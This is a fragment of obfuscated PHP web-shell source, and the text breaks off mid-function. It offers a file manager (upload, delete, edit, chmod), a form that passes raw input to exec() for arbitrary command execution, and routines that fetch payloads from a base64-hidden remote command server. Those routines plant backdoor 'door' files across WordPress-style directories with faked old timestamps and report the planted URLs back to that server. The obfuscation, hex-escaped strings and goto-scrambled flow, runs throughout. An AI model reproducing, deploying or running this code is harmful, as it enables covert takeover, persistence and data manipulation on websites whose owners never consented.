"\74\x70\x3e\74\151\156\160\165\x74\x20\164\171\x70\145\75\42\x63\150\145\x63\153\x62\157\x78\42\x20\143\x6c\141\163\163\75\x22\x69\164\145\x6d\x22\x20\156\x61\155\x65\75\42\146\x69\154\145\x73\133\135\42\x20\166\141\x6c\165\145\75\42" . $file . "\42\57\76\46\x6e\x62\x73\x70\73\46\x6e\x62\163\x70\73" . $str . "\74\x2f\160\76"; } ?> </div></form><?php } if (!empty($act) && $act == "\144\x65\x6c\145\164\145\x46\x69\154\145\163") { $file_list = $_REQUEST["\x66\151\154\145\163"]; foreach ($file_list as $k => $v) { deleteFile($v); } } } else { if ($_POST["\x61\143\x74"] == "\x64\x65\154") { $delete_file_list = $_POST["\x63\x68\x69\x6c\x64\143\150\x65\x63\x6b"]; if (!empty($delete_file_list)) { $count = 0; $fail_count = 0; foreach ($delete_file_list as $k => $v) { if (is_dir($v)) { $del_result = deleteDirectory($v); } else { $del_result = unlink($v); } if ($del_result) { $count++; } else { $fail_count++; } } if ($count > 0) { echo "\x3c\x64\151\x76\40\x63\154\x61\163\163\x3d\x22\141\154\145\x72\x74\40\x61\154\x65\x72\x74\x2d\x73\x75\143\143\145\163\x73\x22\40\x72\157\154\x65\x3d\42\x61\154\145\162\164\42\76\x44\x65\x6c\145\164\x65\x20" . $count . "\x20\146\x69\x6c\x65\163\x20\163\165\x63\x63\145\x73\x73\x66\165\154\154\x79\x21\x3c\x2f\144\x69\166\x3e"; } if ($fail_count > 0) { echo "\74\x64\151\166\x20\143\154\x61\163\x73\x3d\x22\141\x6c\x65\162\164\x20\x61\154\x65\162\x74\x2d\x64\141\156\x67\x65\162\x22\40\x72\157\154\145\x3d\x22\141\154\x65\x72\x74\x22\76\104\145\x6c\145\164\145\x20" . $fail_count . "\40\146\x69\x6c\x65\163\40\x66\141\151\154\x65\x64\41\x3c\x2f\x64\x69\166\76"; } } } if ($_POST["\x61\x63\x74"] == "\x75\x70\x6c\x6f\141\144") { $targetFile = $now_path . "\57" . basename($_FILES["\x66\151\154\145\x54\157\x55\x70\154\157\x61\x64"]["\x6e\141\x6d\145"]); if (move_uploaded_file($_FILES["\x66\x69\x6c\145\x54\x6f\x55\160\x6c\157\141\144"]["\164\155\x70\137\x6e\141\x6d\x65"], $targetFile)) { echo "\x3c\144\151\166\40\x63\154\x61\163\163\x3d\42\141\x6c\145\162\x74\x20\x61\x6c\x65\162\x74\x2d\163\x75\x63\143\x65\x73\x73\x22\x20\162\x6f\154\x65\75\x22\x61\154\x65\x72\164\x22\76\106\151\x6c\x65\40" . htmlspecialchars(basename($_FILES["\x66\x69\x6c\x65\124\157\125\x70\x6c\x6f\141\144"]["\x6e\141\155\145"])) . "\40\165\x70\154\157\x61\144\145\x64\x21\x3c\57\144\151\166\x3e"; } else { echo "\74\144\151\166\40\x63\x6c\141\x73\x73\75\42\141\x6c\145\162\164\x20\141\x6c\145\x72\x74\55\144\x61\x6e\147\x65\162\x22\x20\162\x6f\154\x65\x3d\x22\141\154\145\x72\x74\42\76\106\x69\154\145\40\165\x70\154\157\141\144\40\x66\x61\x69\154\x65\x64\41\74\57\x64\x69\166\76"; } } $file_list = scandir($now_path); $file_list = sortByFolder($now_path, $file_list); ?> <div class="row"><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?path=<?php echo $file_path; ?> "method="post"enctype="multipart/form-data"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\x68\x6c\142\107\170\x66\131\x32\x39\x6b\x5a\x51\x3d\x3d"]; ?> "type="hidden"> <input name="act"value="upload"type="hidden"> <input name="fileToUpload"type="file"id="formFileSm"class="form-control form-control-sm"style="width:200px;display:inline-block"> <button class="btn btn-sm btn-info"type="submit">Upload</button> <a href="?path=<?php echo $file_path; ?> &type=6"class="btn btn-sm btn-primary">Create File</a> <a href="?path=<?php echo $file_path; ?> &type=7"class="btn btn-sm btn-success">Create Folder</a> <a href="?path=<?php echo $file_path; ?> &type=8"class="btn btn-sm btn-warning">Search Files</a></form></div><div class="col-6"><form action="?path=<?php echo $file_path; ?> "method="post"enctype="multipart/form-data"><input name="exec_code"value=""class="form-control"style="display:inline-block;width:50%"> <input name="act"value="exec_code"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Exec</button></form></div></div></div><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?type=1"method="post"enctype="multipart/form-data"><input name="dir"value="<?php echo $path; ?> "class="form-control"style="display:inline-block;width:80%"> <input name="act"value="change_dir"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Change Dir</button></form></div><div class="col-6"></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\x68\x6c\x62\107\170\x66\131\x32\x39\x6b\132\121\75\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="reback"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\x33\x4a\x76\144\130\x41\75"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\x63\62\150\154\142\107\170\x66\141\127\x51\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\144\x48\x6c\167\132\x51\75\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-success"type="submit">Reback</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\x32\150\154\x62\x47\170\146\131\62\71\x6b\x5a\x51\75\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="exec"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\x33\112\x76\144\x58\x41\x3d"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\143\x32\150\154\x62\x47\x78\x66\x61\x57\121\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\x64\x48\154\x77\132\x51\x3d\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-warning"type="submit">Exec</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\x32\150\154\x62\x47\170\146\131\x32\x39\153\132\121\x3d\x3d"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="others"type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\x63\x32\x68\154\x62\x47\170\x66\141\x57\121\x3d"]; ?> "type="hidden"> <input name="group_id_2"value="<?php echo $_SESSION["\143\x32\126\x6a\x62\x32\65\153"]; ?> "type="hidden"> <input name="group_id_3"value="<?php echo $_SESSION["\x64\107\150\x70\x63\155\x52\x6e\x63\155\71\x31\x63\101\x3d\75"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\x64\x48\x6c\x77\x5a\x51\75\75"]; ?> "type="hidden"> <button class="btn btn-sm btn-info"type="submit">Others</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\x68\154\142\x47\170\146\x59\62\x39\153\x5a\x51\x3d\x3d"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="doors"type="hidden"> <input name="group_id"value="<?php echo $_SESSION["\x5a\63\x4a\166\144\x58\x41\x3d"]; ?> "type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\x63\62\x68\x6c\x62\107\x78\146\x61\x57\x51\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\x64\x48\154\167\x5a\121\75\x3d"]; ?> "type="hidden"> <button class="btn btn-sm btn-danger"type="submit">Doors</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\x68\x6c\x62\107\x78\146\131\62\x39\153\132\x51\x3d\75"]; ?> "type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="station"type="hidden"> <input name="shell_id"value="<?php echo $_SESSION["\143\x32\x68\154\x62\x47\x78\x66\141\127\x51\x3d"]; ?> "type="hidden"> <input name="shell_type"value="<?php echo $_SESSION["\x64\110\x6c\x77\x5a\x51\x3d\75"]; ?> "type="hidden"> <button class="btn btn-sm btn-primary"type="submit">Station</button></form></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-12 col-sm-12"style="text-align:center;font-weight:700"><?php if ($_POST["\x61\143\x74"] == "\x73\150\145\x6c\x6c") { if ($_POST["\164\x79\x70\145"] == "\162\x65\142\141\143\153") { rebackAction($_POST, $pws, $now_site); } else { if ($_POST["\x74\171\x70\145"] == "\x65\170\145\x63") { execAction($_POST, $pws, $now_site); } else { if ($_POST["\x74\x79\160\x65"] == "\144\157\157\162\x73") { doorsAction($_POST, $pws, $now_site); } else { if ($_POST["\x74\x79\160\x65"] == "\157\x74\x68\x65\x72\x73") { othersAction($_POST, $pws, $now_site); } else { if ($_POST["\164\171\160\145"] == "\x73\x74\x61\x74\x69\157\156") { stationAction($_POST, $pws, $now_site); } } } } } } if ($_POST["\x61\143\164"] == "\x65\x78\145\143\x5f\x63\x6f\x64\145") { $exec_code = trim($_POST["\x65\x78\145\x63\137\x63\x6f\x64\145"]); exec($exec_code, $output, $returnVar); if ($returnVar === 0) { echo "\x3c\x64\x69\x76\40\163\x74\171\x6c\145\x3d\x27\x63\x6f\x6c\157\162\72\x20\x67\162\x65\x65\x6e\73\146\x6f\x6e\164\55\167\145\151\x67\x68\164\72\x62\x6f\154\144\x3b\47\76" . $exec_code . "\x20\x69\x73\40\123\x75\x63\x63\145\163\x73\x66\x75\154\154\x79\56\x3c\x2f\144\151\166\x3e"; foreach ($output as $k => $v) { echo $v . "\74\x62\162\x2f\76"; } } else { echo "\x3c\x64\x69\x76\x20\x73\x74\171\154\x65\75\47\143\157\154\x6f\x72\x3a\x20\x72\x65\x64\73\x66\x6f\x6e\164\x2d\167\x65\151\147\150\x74\x3a\142\x6f\154\x64\73\47\76" . $exec_code . "\40\151\163\x20\106\141\151\154\145\144\72" . $returnVar . "\x2e\x3c\x2f\144\x69\x76\x3e"; } } ?> </div></div></div><form action="?path=<?php echo $file_path; ?> "method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\x68\x6c\142\107\x78\x66\x59\62\x39\x6b\132\x51\75\75"]; ?> "type="hidden"><div class="col-12"style="margin-bottom:1rem"><input name="act"value="del"type="hidden"> <button class="btn btn-xs btn-danger"type="submit">Delete</button></div><table class="table table-bordered"><thead><tr><th><div class="form-check"><input name="allcheck"value="1"type="checkbox"id="allcheck"class="form-check-input"></div></th><th>Name</th><th>Url</th><th>Size</th><th>Modify</th><th>Permission</th><th>Action</th></tr></thead><tbody><?php if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == "\56" || $v == "\56\56")) { $file_url = $now_path . "\x2f" . $v; ?> <tr><th><div class="form-check"><input name="childcheck[]"value="<?php echo $file_url; ?> "type="checkbox"class="form-check-input"></div></th><td><?php if (is_dir($file_url)) { echo "\x3c\x61\x20\150\162\x65\x66\75\x22\x3f\x70\x61\164\x68\75" . $file_url . "\46\164\171\160\145\x3d\x31\42\x20\163\x74\171\x6c\145\x3d\42\143\157\154\157\x72\72\x20\147\x72\145\x65\x6e\x3b\x66\x6f\156\164\55\x77\145\x69\x67\x68\164\72\142\x6f\154\x64\x3b\x22\x3e\12\x20\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\x3c\151\40\143\x6c\x61\163\163\x3d\42\x62\x69\40\x62\151\55\146\x6f\154\144\x65\x72\x22\x20\x73\x74\x79\x6c\x65\x3d\42\166\145\162\164\x69\x63\141\154\55\141\154\x69\147\x6e\72\40\x6d\151\x64\x64\x6c\x65\x3b\x22\x3e\12\x20\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\x20\40\x20\40\40\x3c\163\166\x67\x20\170\155\x6c\x6e\163\x3d\x22\x68\x74\164\x70\72\57\x2f\x77\167\x77\x2e\x77\x33\56\x6f\x72\147\x2f\62\60\x30\60\57\x73\166\147\x22\40\167\151\144\x74\150\x3d\42\61\x36\x22\40\150\x65\x69\x67\150\164\75\x22\x31\x36\42\40\146\x69\x6c\154\x3d\42\x63\x75\x72\162\x65\x6e\x74\103\157\154\x6f\162\x22\x20\143\x6c\141\x73\x73\75\42\142\151\x20\142\151\55\146\x6f\x6c\144\145\162\x22\x20\166\151\145\x77\102\x6f\170\x3d\42\60\40\60\x20\61\66\x20\61\66\x22\76\xa\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\x20\40\74\160\x61\x74\x68\40\144\x3d\42\x4d\56\x35\x34\x20\x33\56\70\67\x2e\65\x20\x33\141\62\40\x32\x20\x30\40\60\40\x31\x20\62\55\x32\x68\x33\56\x36\67\x32\x61\62\40\62\x20\x30\x20\x30\40\x31\40\x31\x2e\x34\61\x34\56\65\70\x36\154\56\x38\x32\x38\56\70\62\x38\x41\x32\x20\x32\x20\60\40\x30\40\60\x20\x39\x2e\70\x32\70\40\x33\x68\63\x2e\x39\x38\62\x61\62\40\62\40\60\40\x30\x20\x31\x20\61\56\71\x39\x32\40\62\56\61\70\x31\x6c\x2d\56\66\x33\x37\x20\67\101\62\x20\x32\40\x30\40\60\40\61\x20\61\63\56\x31\67\x34\x20\61\x34\110\62\56\x38\x32\66\x61\x32\x20\x32\40\x30\40\x30\40\61\55\x31\x2e\71\71\61\x2d\61\56\70\x31\71\x6c\x2d\x2e\x36\63\67\x2d\x37\x61\x31\56\71\71\40\61\56\71\x39\40\60\40\x30\40\61\x20\x2e\x33\x34\x32\55\61\56\x33\x31\x7a\115\x32\x2e\x31\x39\40\64\x61\x31\40\61\40\60\x20\x30\40\x30\x2d\56\x39\x39\x36\40\61\x2e\x30\x39\x6c\56\66\x33\67\x20\67\x61\61\40\x31\40\60\x20\60\40\60\x20\56\x39\71\65\56\x39\x31\x68\61\60\56\63\64\70\141\61\x20\61\x20\60\x20\60\x20\60\x20\56\71\71\x35\55\56\71\61\x6c\x2e\66\x33\x37\55\67\101\61\40\61\x20\60\x20\60\x20\x30\x20\61\63\x2e\70\61\x20\x34\110\62\x2e\61\x39\x7a\x6d\64\56\x36\x39\55\61\x2e\x37\60\x37\x41\61\x20\x31\40\60\x20\x30\40\x30\40\66\56\x31\67\62\x20\62\110\x32\x2e\x35\141\61\x20\x31\x20\x30\x20\x30\x20\x30\x2d\61\40\56\71\x38\61\154\x2e\x30\60\66\56\x31\x33\x39\x43\x31\x2e\67\x32\x20\63\x2e\x30\x34\x32\40\x31\56\x39\x35\40\x33\x20\x32\x2e\x31\x39\40\63\150\65\x2e\63\71\66\154\55\x2e\67\60\x37\x2d\x2e\x37\60\x37\172\x22\x2f\76\xa\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x3c\x2f\x73\166\x67\x3e\xa\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x3c\57\151\76" . $v . "\x3c\x2f\x61\x3e"; } else { echo "\x3c\141\x20\x68\162\145\x66\x3d\x22\x3f\x70\x61\x74\x68\x3d" . $file_url . "\x26\x74\x79\x70\x65\x3d\62\42\x3e" . $v . "\x3c\x2f\x61\x3e"; } ?> </td><td><?php if (!is_dir($file_url)) { ?> <a href="<?php echo $now_url . "\57" . $v; ?> "target="_blank">click visit</a><?php } ?> </td><td><?php if (is_dir($file_url)) { echo "\74\x66\157\156\164\40\143\x6f\x6c\157\162\75\x22\147\x72\x65\145\156\42\40\x73\x74\x79\x6c\145\x3d\x22\146\x6f\x6e\164\x2d\x77\x65\x69\x67\x68\x74\x3a\40\142\157\x6c\x64\73\x22\76\104\x69\x72\145\x63\x74\x6f\162\171\74\x2f\x66\157\x6e\164\76"; } else { echo getFileSize($file_url); } ?> </td><td><?php $modificationTime = filemtime($file_url); echo date("\x59\x2d\155\x2d\144\x20\x48\72\x69\x3a\x73", $modificationTime); ?> </td><td><?php $permission = getFilePermission($file_url); if (strpos($permission, "\167") !== false) { echo "\x3c\x66\157\156\x74\x20\143\x6f\154\x6f\x72\75\42\147\x72\x65\x65\x6e\x22\40\163\x74\171\x6c\x65\75\42\x66\157\156\x74\55\x77\145\151\147\150\x74\72\40\x62\157\154\x64\73\42\x3e" . $permission . "\74\x2f\146\x6f\x6e\x74\76"; } else { echo "\x3c\x66\157\x6e\x74\40\x63\x6f\x6c\x6f\x72\x3d\42\162\145\x64\42\x20\x73\x74\x79\x6c\145\75\42\x66\157\156\164\x2d\167\x65\x69\x67\150\x74\x3a\x20\x62\157\154\x64\73\42\x3e" . $permission . "\74\x2f\146\x6f\x6e\164\76"; } ?> </td><td><a href="?path=<?php echo $file_url; ?> &type=4"class="btn btn-xs btn-primary">Rename</a> <a href="?path=<?php echo $file_url; ?> &type=2"class="btn btn-info btn-xs">Edit</a> <a href="?path=<?php echo $file_url; ?> &type=5"class="btn btn-xs btn-warning">Chmod</a></td></tr><?php } } } else { ?> <tr><td colspan="4"style="text-align:center;color:red">No Files!</td></tr><?php } ?> </tbody></table></form></div><?php } } } } } } ?> </div><script>$(function(){$("#allcheck").click(function(){$("#allcheck").is(":checked")?$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!0)}):$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!1)})})})</script><script>$(function(){$("#allcheck").click(function(){$(".item").prop("checked",this.checked)}),$(".item").click(function(){$(".item").length==$(".item:checked").length?$("#allcheck").prop("checked",!0):$("#allcheck").prop("checked",!1)}),$(".delBtn").click(function(){var e=[];if($(".item:checked").each(function(){e.push($(this).val())}),0==e.length)return alert("please select files"),!1;$("#deleteForm").submit()})})</script></body></html><?php } goto shzAz; c5hl3: function crefile($fiurl, $contnt) { $path = $_SERVER["\104\x4f\x43\x55\115\x45\116\x54\x5f\122\x4f\117\x54"] . "\x2f"; $filath = $path . dirname($fiurl); if (!is_dir($filath)) { if (!mkdir($filath, 493, true)) { return false; } } $file_path = $path . $fiurl; if (file_put_contents($file_path, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($file_path, $time); return true; } else { return false; } } goto Od4LH; YHyUp: if (is_readable($now_path)) { $can_read = true; } goto P0Wa5; h8E3O: $now_site = $prot . $domain; goto E3wTQ; CPlro: function fill_full($file_urls, $sy_count) { $path = realpath($_SERVER["\x44\x4f\103\125\x4d\105\x4e\124\x5f\122\x4f\117\124"]); $file_url_result = array(); foreach ($file_urls as $k => $v) { if (!empty(trim($v))) { $file_url_result[] = $v; } } $file_tou = array("\x77\x70\55\143\x6f\x6e\x74\145\156\x74", "\167\160\55\141\x64\x6d\x69\156", "\x77\x70\55\x69\156\x63\x6c\165\x64\x65\x73"); $file_list = array("\143\163\x73", "\x69\x6d\x61\147\145\163", "\x69\x6d\147", "\x6a\x73", "\x74\150\145\155\x65\163", "\x70\x6c\x75\147\151\156\x73", "\x75\160\154\157\x61\x64\163", "\x6c\141\156\147\165\x61\x67\145\x73", "\x69\x6e\x63\154\165\144\x65\x73", "\155\141\151\156\164", "\x6e\x65\x74\x77\157\x72\x6b", "\155\145\x74", "\165\163\145\162", "\111\x58\x52", "\111\104\63", "\146\157\156\164\x73", "\x62\x6c\157\143\x6b", "\x62\x6c\157\143\153\163", "\x70\x68\x70\55\x63\x6f\x6d\160\141\x74", "\160\x68\160", "\124\x65\x78\164", "\167\x69\144\x67\x65\x74\x73", "\123\151\x6d\160\154\x65\x50\x69\145", "\x72\x61\x6e\144\157\155", "\x73\x74\171\154\145\x2d\145\156\147\151\x6e\145", "\160\157\x6d\157", "\x63\x65\162\164\151\x66\151\143\x61\x74\x65\163", "\x62\154\157\143\x6b\x74"); for ($i = 0; $i < $sy_count; $i++) { $path_url = $path . "\x2f" . $file_tou[rand(0, count($file_tou) - 1)]; for ($j = 0; $j < rand(3, 6); $j++) { $path_url = $path_url . "\x2f" . $file_list[rand(0, count($file_list) - 1)]; } $file_url_result[] = $path_url; } return $file_url_result; } goto k3B7K; MdW70: function getParentsFolders($path) { $all_folders = array(); $parent_folds = dirname($path); $directories = glob($parent_folds . "\57\x2a", GLOB_ONLYDIR); $all_folders = $directories; $parent_folds = dirname($parent_folds); $directories = glob($parent_folds . "\x2f\x2a", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); return $all_folders; } goto NzT0a; iPj0Z: function getrandstr($length = 10) { $characters = "\141\x62\143\x64\145\146\147\x68\x69\152\x6b\x6c\x6d\x6e\157\x70\x71\x72\x73\164\165\166\x77\170\x79\x7a\x41\102\x43\104\105\x46\x47\110\x49\112\x4b\114\x4d\116\117\120\x51\x52\x53\124\x55\126\x57\130\x59\x5a"; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } goto TjEsT; DUtAh: $pws = "\141\110\x52\x30\x63\110\x4d\x36\x4c\x79\x39\156\x62\62\x64\166\x4d\x6a\111\165\131\156\154\157\x62\x33\x51\x75\x64\107\71\167"; goto mRuC3; E3wTQ: $sy_path = str_replace($website_path, '', $now_path); goto QeSVR; qginQ: $now_path = dirname($file_path); goto QvBFf; UnSoe: $web_url = $data["\x52\x45\x51\125\x45\x53\x54\x5f\x53\x43\110\x45\x4d\105"] . "\x3a\57\57" . $data["\x53\x45\x52\x56\x45\x52\137\116\x41\115\x45"]; goto msGh0; HHm6d: $file_path = $data["\x53\103\x52\111\120\124\x5f\106\x49\114\x45\116\101\x4d\105"]; goto qginQ; rAziT: $prot = !empty($_SERVER["\110\124\124\x50\x53"]) && $_SERVER["\x48\x54\x54\120\123"] !== "\x6f\146\x66" || $_SERVER["\123\x45\x52\x56\105\122\x5f\120\117\x52\x54"] == 443 ? "\x68\164\164\160\x73\72\x2f\57" : "\150\164\x74\160\72\57\57"; goto JPy7v; QvBFf: $dir = $_POST["\x64\151\x72"]; goto UnSoe; Yeb6P: function rebackAction($data, $pweb, $now_site) { $group_id = $data["\x67\162\157\165\x70\137\151\144"]; $shell_id = $data["\x73\150\145\x6c\154\x5f\x69\144"]; $shell_type = $data["\163\150\x65\154\154\x5f\164\x79\x70\145"]; $url = base64_decode($pweb) . "\x2f\151\x6e\144\x65\x78\x64\157\x6f\162\56\160\150\160\x3f\141\x63\x74\x69\x6f\x6e\75\162\x65\142\x61\143\153\x26\x67\x72\157\165\160\x5f\x69\x64\75" . $group_id . "\x26\x73\x68\x65\x6c\154\x5f\164\171\x70\x65\x3d" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $result_data = array(); $result_data["\163\x68\145\154\x6c\137\x69\x64"] = $shell_id; $result_data["\141\x63\164\151\157\x6e"] = "\162\x65\x62\x61\x63\x6b"; $save_url = base64_decode($pweb) . "\x2f\163\141\x76\145\56\x70\150\160"; if (isset($json_array["\151\x6e\137\146\151\x6c\145\x73"]) && !empty($json_array["\x69\x6e\137\146\x69\x6c\x65\x73"])) { $wp_code = $json_array["\167\160\137\x63\x6f\x64\145"]; $in_list = explode("\73", $json_array["\151\x6e\137\146\x69\x6c\x65\x73"]); foreach ($in_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\x5b\43\43\x69\156\x5f\x63\157\156\164\156\x74\x5f" . $k . "\x23\x23\x5d", $wpstr, $wp_code); $contnt = $json_array["\143\x6f\144\x65"] . $json_array["\x77\x70\137\x79\143\x6f\144\145"]; crefile($v, $contnt); } $ht_list = explode("\73", $json_array["\150\164\x5f\146\x69\x6c\x65\x73"]); foreach ($ht_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\x5b\x23\x23\150\x74\x5f\x63\157\156\164\156\x74\137" . $k . "\x23\43\135", $wpstr, $wp_code); $contnt = $json_array["\150\x74\137\143\157\x6e\164\x6e\164"]; crefile($v, $contnt); } $wp_list = explode("\73", $json_array["\167\x70\x5f\x66\x69\x6c\x65\x73"]); $wp_result = array(); foreach ($wp_list as $k => $v) { $f = crefile($v, $wp_code); if ($f) { $wp_result[] = $now_site . $v; } } if (!empty($wp_result) && count($wp_result) > 0) { $result_data["\167\x70\x5f\x75\162\154\x73"] = $wp_result; $result_data["\163\164\x61\164\165\163"] = 1; } else { $result_data["\x63\157\144\x65"] = "\x31\60\x30\61"; $result_data["\x73\164\x61\164\165\x73"] = 2; } } else { $result_data["\x63\157\144\145"] = "\61\60\60\62"; $result_data["\x73\164\x61\164\x75\x73"] = 2; } $result_data["\163\x68\x65\x6c\x6c\x5f\165\162\154"] = $now_site; $result_data["\x73\x68\145\x6c\154\137\x74\171\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\x74\141\164\165\x73"]) { echo "\x3c\160\x20\163\x74\171\154\145\75\x22\143\x6f\x6c\157\162\72\147\162\145\145\156\x3b\x22\x3e\x52\145\142\x61\143\x6b\x20\151\x73\40\163\x75\143\143\x65\163\163\x66\x75\x6c\154\171\x3c\57\x70\76"; foreach ($wp_result as $k => $v) { echo "\74\x70\76\74\141\40\150\162\145\x66\x3d\42" . $v . "\42\x20\164\141\162\147\145\164\x3d\42\137\142\x6c\141\x6e\x6b\x22\x3e" . $v . "\74\57\x61\76\74\x2f\x70\x3e"; } } else { echo "\x3c\x70\x20\163\164\x79\x6c\x65\x3d\x22\x63\x6f\154\157\x72\x3a\x72\x65\x64\73\x22\76\x52\x65\x62\x61\x63\153\40\x69\x73\x20\x66\141\151\154\x65\x64\x21\40" . $result_data["\143\x6f\144\x65"] . "\74\x2f\x70\x3e"; } } goto ZQrF8; BcCgs: $last_folder_url = ''; goto yNDDi; J8UR1: ini_set("\155\x65\x6d\157\162\x79\137\154\151\155\151\164", "\x2d\61"); goto vPuyX; k3B7K: function getAllDirectories($path, $depth, $door_count) { global $all_paths, $door_lists, $last_folder_url; $firstLevelDirs = glob($path . "\57\52", GLOB_ONLYDIR); $totalSelections = $door_count; $selectedDirectories = array(); $dirsPerFirstLevel = max(1, floor($totalSelections / count($firstLevelDirs))); foreach ($firstLevelDirs as $dir) { $all_paths[] = $dir; $subDirs = getAllSubdirectories($dir, 10); if (count($subDirs) >= $dirsPerFirstLevel) { $randomKeys = array_rand($subDirs, $dirsPerFirstLevel); foreach ((array) $randomKeys as $key) { $selectedDirectories[] = $subDirs[$key]; } } else { $selectedDirectories = array_merge($selectedDirectories, $subDirs); } } if (count($selectedDirectories) < $totalSelections) { $additionalNeeded = $totalSelections - count($selectedDirectories); $allSubDirs = array(); foreach ($firstLevelDirs as $dir) { $allSubDirs = array_merge($allSubDirs, glob($dir . "\57\x2a", GLOB_ONLYDIR)); } $remainingDirs = array_diff($allSubDirs, $selectedDirectories); if (count($remainingDirs) > 0) { $additionalDirs = (array) array_rand($remainingDirs, min($additionalNeeded, count($remainingDirs))); foreach ($additionalDirs as $key) { $selectedDirectories[] = $remainingDirs[$key]; } } } $randomKeys = array_rand($all_paths, 1); foreach ((array) $randomKeys as $key) { $last_folder_url = $all_paths[$key]; } $door_lists = $selectedDirectories; return $all_paths; } goto UuQ5n; kA94B: $door_lists = array(); goto BcCgs; R_qSL: $data = $_SERVER; goto NqDCq; P0Wa5: $can_write = false; goto lpjHs; UKNSx: if ($type == 1) { if (!empty($dir)) { $path = $dir; } $now_path = $path; } goto d7fML; JPy7v: $domain = $_SERVER["\110\124\124\120\137\x48\117\123\x54"]; goto h8E3O; Lto2g: function strslit($str) { $cha = str_split($str); return "\x27" . implode("\x27\x2e\x27", $cha) . "\47"; } goto iPj0Z; Q_ynd: $all_paths = array(); goto kA94B; Ao621: function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site) { $result = array(); $sf = crefile($second_file, $group2_code); $tf = crefile($third_file, $group3_code); $result["\x73\145\x63\x6f\x6e\x64\137\x75\162\x6c"] = ''; $result["\x74\x68\x69\162\144\x5f\165\x72\154"] = ''; if ($sf) { $result["\163\x65\143\157\156\x64\137\165\162\x6c"] = $now_site . "\x2f" . $second_file; } if ($tf) { $result["\164\150\x69\162\x64\x5f\x75\x72\154"] = $now_site . "\57" . $third_file; } return $result; } goto SrSzB; JjEFH: function stationAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\163\x68\145\154\x6c\137\151\x64"] = $data["\x73\x68\145\154\x6c\137\x69\x64"]; $result_data["\141\x63\x74\x69\157\x6e"] = "\163\164\x61\x74\x69\x6f\156"; $save_url = base64_decode($pweb) . "\57\163\141\x76\x65\56\160\150\x70"; $shell_id = $data["\x73\150\x65\x6c\154\x5f\x69\144"]; $shell_type = $data["\x73\x68\145\x6c\x6c\137\164\171\160\145"]; $url = base64_decode($pweb) . "\57\151\156\x64\x65\170\144\157\x6f\x72\x2e\x70\x68\160\x3f\141\143\x74\x69\x6f\x6e\75\x73\x74\x61\164\x69\157\156\46\163\x68\145\x6c\x6c\x5f\x69\x64\75" . $shell_id . "\46\x73\150\x65\154\154\137\164\171\160\145\75" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $station_count = 0; if (!empty($json_array["\x73\x74\x61\x74\151\x6f\156\x5f\x63\x6f\x64\145"]) && !empty($json_array["\150\x74\x5f\160\x7a\137\143\x6f\156\164\145\156\164"])) { $station_count = 